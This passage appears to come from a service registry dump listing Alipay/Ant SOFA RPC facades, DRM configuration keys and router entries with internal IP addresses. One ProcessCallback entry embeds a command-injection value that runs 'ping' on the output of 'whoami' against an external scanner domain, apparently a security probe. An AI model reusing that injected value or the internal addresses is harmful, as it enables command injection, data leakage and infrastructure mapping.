alipay.csguide.service.facade.api.PageSensitiveQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ImgConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.uniform.facade.UniformCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.group.TeamProfitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:datatrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.UserProtocolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbindustryomp.common.service.facade.api.merchant.MerchantRecruitInviteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.v2.ApplicationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbreservationprod.common.service.facade.commonreservation.PlanRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_KBSYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finopencore.common.service.fop.facade.FopSmallGoalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.DataProxyConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.RiskEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.CharityRecommendGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:polaristwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorRecruitMenuSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.sysparam.SysParamManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.biz.service.lisa.mqtt.IotDownstreamMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.DxRuleSetErrorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.ci.CodeAttackCiManagementFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassistantmng.common.service.facade.task.api.QwtTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@scsupport#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitContainerLayoutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.18.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmarket.service.PcreditMarketMessageTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.65.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.facade.weekcard.ServiceReminderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huoyan.merchant.MerchantLdcTairCompareComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.merchantinfo.NewMerchantInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.FellowGroupHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ibizsupport.common.service.facade.api.DedicatedFundRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.revInstIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_O_COUNTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdataquery.common.service.facade.api.OdpsAggrBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.cashReconWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.build.api.MiniAppBuildQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:pledgecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyUserQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcare.common.service.facade.api.HealthCareDiagnosticReportAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.BrmMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.task.AssetSearchService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.36.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adopsmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.point.GiftPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:voucherCore_templateCopy_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:psslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-insxhbbatch-three-layers#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.tenant.client.biz.service.UserManageService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.bizprodmng.bizprodmngDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.DingMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.template.purchase.action.CreateFintradeOrderAction:1.0:createActiveFintradeOrderAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-S-OUT-GOTONE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_TICKET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcardcore.common.service.facade.mpcard.MPcardUnionFundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rds.common.service.facade.service.RdsDbService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.DeductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.mobiledecision.EnvironmentTransfer.operator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxconf.service.facade.ctrl.DataStructConfigService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.attribute.PcreditAgreementAttributeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.orderfront:name=com.alipay.orderfront.task.config.compensateTaskLoadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcredittrans.facade.baopoint.api.BpctransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:minicreateweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@secuinfos#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mrchselfop.common.service.ooda.facade.darwin.MetricService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcAssignServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:abilitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.core.service.security.SecurityService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.IppAuditProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.common.MapDao:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.resetErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoscene.core.service.migrate.repo.FinsMigrateDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfingoods.common.service.facade.api.GoodsStorageDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.privilege.PrivilegeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.glcxyz.audit.ShopValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmembercore.common.facade.memberproduct.MemberCardProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.inspect.UcdpInspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.wagu.WaguBioSecurityRuleChecker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.IntlEventRelateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:mapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frboss.facade.api.RiskMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finassetpreference_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smileseries.service.SmileLocalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.AccurateTestManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.FluxstrategyDrm3rdVersion.outfluxWhiteInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zim.common.service.facade.business.api.BizIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.171.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:paygrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antuxsys.facade.QuestionnaireDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbaudit.common.service.facade.audit.ShopItemAlignCompetitorAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:psslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PayacceptancePayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.calculateHKQDII,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.facade.exterface.ExterfaceTemporaryFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.YebSysParamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.calendar.api.DeductCallBackResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.BrandBuyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iaassettrans.facade.common.manage.api.AccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowSubjectLabelGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransReverseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.ContractTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finquantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.15.252.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.ding.DingDepartmentRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.query.facade.ProdtransQueryExtPropFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.IndustryPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.searchportal.common.service.facade.appcenter.SchSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.bankcard.facade.ValidateRecordQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assay.common.antiintrusion.facade.AlarmMisreportCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.245.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromobus.common.service.facade.recruit.api.RecruitContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.plan.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_ASSETTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterMetaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_ORDERMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipromomng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.MybankCardAccountOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.biz.shared.life.LifeAppServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALIPASSPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.securityprodmng.common.service.facade.QueryCtuEventInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundtrade.common.service.facade.api.QuickTransferTradeAssetMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.MerchantNewsStatsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.alarmanalysis.manager.SelfAlarmChangeAnalysis:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.biz.commodities.service.accountgold.CommoditiesAccountGoldTradeConfirmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.starfish.facade.StarfishTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.AssetAllowanceDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.CacheStorageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finfocore.FinfocoreShopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_O_YUYAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ap.mobileprod.common.service.facade.codec.CodecRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6273@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampRelationRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.settle.ProjectSettleMoneyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_FININFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:promobffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.home.assistant.convertor.RuleSetConvertor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.odps.OdpsClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.manager.facade.api.EinvInvoiceApplyFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.SentimentEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.FacepaySwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.195.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgmng.common.service.facade.role.ProjectMemberRoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.AttachmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insautomarket_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.template.TemplateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:idpatrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.querySmidRelationParalleNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`86842598-80102053-uniqueId-104003030.antscanner.global.alipay.com;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.157.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.DepositService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamProjectApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcharge.common.service.facade.api.admin.AdMsgPublisherServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.service.model.meta.ModelMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ichecker.service.facade.modelcheck.TimeLinessRuleCheckSPI:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmDebugFacade:1.0:bbcmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.ResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.common.service.integration.drm.resource.DrmForSupportPresetPaytool.drmForFpBizProductWhiteSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_G_CHANNELROUTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.common.service.facade.AdvanceAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductFacade:1.0:MOBILE_CERT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdevops_ownerTransfer_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.195.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.falcon.common.facade.DrmManageFalconFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.229.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nfcc.common.service.facade.limit.H2RpcLimitOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chargefront:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.DecisionServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.forceClosedChannels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.ampf.DeviceTypeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ofpgrowth.common.service.facade.api.PayTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.DeployAgentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.claimoperation.common.service.ClaimCaseIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.migratedrmhandler.isThreadStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:microloan_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.biz.promo.assist.rpc.MenuQueryRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditdecisionx@XFIRE#@#DEF